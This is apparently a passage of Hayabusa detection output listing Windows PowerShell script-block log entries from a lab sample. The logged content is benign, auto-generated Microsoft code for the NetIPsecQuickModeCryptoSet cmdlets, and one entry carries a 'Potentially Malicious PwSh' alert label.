$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', 